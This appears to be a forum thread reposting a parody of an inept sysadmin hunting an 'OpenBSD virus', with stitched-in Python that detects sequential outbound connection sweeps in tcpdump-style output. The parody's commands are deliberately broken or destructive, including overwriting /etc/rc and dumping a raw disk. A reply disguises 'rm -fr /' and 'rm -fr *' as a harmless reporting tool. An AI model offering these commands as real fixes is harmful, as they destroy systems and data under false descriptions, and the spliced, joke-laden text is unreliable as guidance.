Message Boards » Tech Talk » OpenBSD Virus Found?
lewisje
All American
9196 Posts

I am wondering if this is a new virus that I have found...

I was watching tcpdump today over lunch and I saw about a thousand outgoing
connections. I didn't know what was causing it, but it was pretty funny to
see. So I watched about 20 minutes while I mawed on my sandwich and then I
noticed that the target IP's were all sequential! A quick search on Googles
told me something was certainly amiss.

So when lunch hour was up, I decided to get to the bottom of this before the
higher-ups here at the bank noticed that outbound browsing was impossible
due to the saturated OC12. Good thing I don't have to worry about HIPA
requirements today, 'eh? Haha!

First, I decided I needed to get to the root of the problem, no pun
intended:

# fstat / | tcpdump -i - | less

Well, that doesn't work. It seems some newb committer removed the switch to
allow tcpdump to read from stdin. Thanks a lot, buster!

With tcpdump not being useful at all with tracking down this networking
problem, I knew I had to do something fast! The natives were getting
restless as I saw the suited buzzards churning outside the NOC! So I locked
the door and decided to start by removing all unneeded device drivers from
my kernel. For the archives, a simple way of doing this is as follows:

# dmesg > /tmp/mygoodstuff
# cat /usr/src/sys/`machine`/conf/GENERIC > /tmp/mybadstuff
# diff /tmp/mygoodstuff /tmp/mybadstuff | uniq -v > \
/usr/src/sys/`machine`/NEWGENERIC

Then I compiled and installed the brand new kernel in an attempt to cure the
problems of the day (or lunch hour lol).

After a quick smoke break, I rebooted the system with the new kernel. At
this point, I decided to systrace the entire system. Again, for the
archives, this is how one would do it (please add this to the FAQ, dudes,
because I don't like having to repeat this every few days):

# echo "systrace /etc/rc" > /etc/rc

As time marched forward and after a quick reboot, I ran into a couple of
snags in the armor! It seems that the virus may have taken its toll on the
system which is a Soekris attached to a Sun D1000 drive array with a 3.2V
PCI card (sorry guys I don't have the dmesg, but I can send one from Debian
if that would help). Anyway, I tried to debug the system using the following
command:

# systrace tcpdump -i /dev/systrace | cut -d' -f 3 | \
sed '/12/' | for a in `cat /dev/systrace`; do echo "$a" > /dev/console

This didn't seem to produce the desired results so now I am stuck in a poop
boat without a paddle, so to speak. Can anybody help?

P.S. I already have sent the output of "cat /dev/wd0c > /tmp/obsdvirus" to
Symantec for them to analyze. That's what we pay them for!

P.P.S. Check out my blog in my sig!

--------
Mr. Billy B. Bilano, MSCE, CCNA

Expert Sysadmin Since 2003!
'C:\WINDOWS, C:\WINDOWS\GO, C:\PC\CRAWL' -- RMS
http://monkey.org/openbsd/archive/misc/0406/msg00216.html

11/13/2010 1:22:05 PM
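The one real symptom in the post above is worth taking seriously: a host that opens a large number of outbound connections to consecutive destination addresses is usually scanning, whether because of a worm or because someone is driving it. As an added example that is not part of this thread or of any OpenBSD tool, the Python below parses tcpdump-style lines (constructed sample data, not a real capture) and reports, per source host, the longest run of SYNs to strictly sequential destination IPs. The regex, the sample lines, the function names and the `min_run` threshold are all assumptions made for the example.

```python
"""Spot outbound address sweeps in tcpdump-style output.

Added example for this thread; the log lines below are constructed and
the line format only mimics tcpdump's default TCP output.
"""
import ipaddress
import re
from collections import defaultdict

# Constructed sample: 10.0.0.5 walks 192.0.2.10 .. .15, 10.0.0.7 is ordinary traffic.
SAMPLE_LINES = """\
12:31:01.000001 IP 10.0.0.5.40001 > 192.0.2.10.80: Flags [S], seq 1000, win 64240, length 0
12:31:01.000210 IP 10.0.0.5.40002 > 192.0.2.11.80: Flags [S], seq 1001, win 64240, length 0
12:31:01.000420 IP 10.0.0.5.40003 > 192.0.2.12.80: Flags [S], seq 1002, win 64240, length 0
12:31:01.000630 IP 10.0.0.5.40004 > 192.0.2.13.80: Flags [S], seq 1003, win 64240, length 0
12:31:01.000840 IP 10.0.0.5.40005 > 192.0.2.14.80: Flags [S], seq 1004, win 64240, length 0
12:31:01.001050 IP 10.0.0.5.40006 > 192.0.2.15.80: Flags [S], seq 1005, win 64240, length 0
12:31:01.001260 IP 192.0.2.10.80 > 10.0.0.5.40001: Flags [R.], seq 0, ack 1001, win 0, length 0
12:31:02.000000 IP 10.0.0.7.51000 > 198.51.100.3.443: Flags [S], seq 77, win 64240, length 0
12:31:02.500000 IP 10.0.0.7.51001 > 203.0.113.9.443: Flags [S], seq 78, win 64240, length 0
"""

# Only initial SYNs count as connection attempts; replies (R., S., .) are ignored.
LINE_RE = re.compile(
    r"IP (?P<src>\d+\.\d+\.\d+\.\d+)\.\d+ > (?P<dst>\d+\.\d+\.\d+\.\d+)\.\d+: Flags \[S\]"
)


def parse_syns(text):
    """Return (src, dst) pairs for every outbound SYN, in capture order."""
    pairs = []
    for line in text.splitlines():
        m = LINE_RE.search(line)
        if m:
            pairs.append((m.group("src"), m.group("dst")))
    return pairs


def longest_sequential_run(dsts):
    """Longest run of destinations where each address is the previous one plus 1.

    Comparison is on the integer form, so a run may cross an octet boundary
    (192.0.2.255 -> 192.0.3.0 still counts as sequential).
    """
    if not dsts:
        return 0
    best = run = 1
    for prev, cur in zip(dsts, dsts[1:]):
        if int(ipaddress.ip_address(cur)) == int(ipaddress.ip_address(prev)) + 1:
            run += 1
        else:
            run = 1
        best = max(best, run)
    return best


def find_sweeps(text, min_run=4):
    """Map each source host to its longest sequential run, if it reaches min_run."""
    by_src = defaultdict(list)
    for src, dst in parse_syns(text):
        by_src[src].append(dst)
    result = {}
    for src, dsts in by_src.items():
        run = longest_sequential_run(dsts)
        if run >= min_run:
            result[src] = run
    return result


if __name__ == "__main__":
    for src, run in find_sweeps(SAMPLE_LINES).items():
        print(f"{src}: {run} consecutive destination addresses (possible sweep)")
```

In practice you would feed it `tcpdump -n -l 'tcp[tcpflags] & (tcp-syn|tcp-ack) == tcp-syn'` output on the gateway rather than a pasted sample, and a hit is a reason to isolate the source host and look at what process owns the sockets, not to start rebuilding kernels.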

llama
All American
841 Posts

OpenBSD comes with an already integrated Standard Activation Wizard
that does it all for you at the press of a button. Can it get easier?
It's called "ReportMagic" or, for short, "rm". There is an updated version of
it supplied with the ports collection, BUT do NOT use it! The version
in ports doesn't get the connection to the restartable system calls
right and prints silly warnings. That's why it is not integrated in the
high quality default distribution. So it is much better to use the
default version integrated in OpenBSD. As arguments you must supply
which elements of a standard you want to break and the name of the
standard.
If you want to break all elements of a standard, give the wildcard
character *; if you want only the top-level elements of a standard, give
the standard root character /; bottom elements */; elements between
top and bottom /*/; and so on ...

Examples:
rm -fr * POSIX1a
rm -fr / ASN.1

the -fr Option gives u a nicely formatted _f_ull _r_eport.
Unfortunately you must use this option otherwise it will do nothing
because there is no sense in breaking a standard without reporting it,
isn't it?

11/13/2010 11:04:10 PM

smc
All American
9221 Posts

NOT FUNNY.

11/14/2010 12:14:04 AM


© 2024 by The Wolf Web - All Rights Reserved.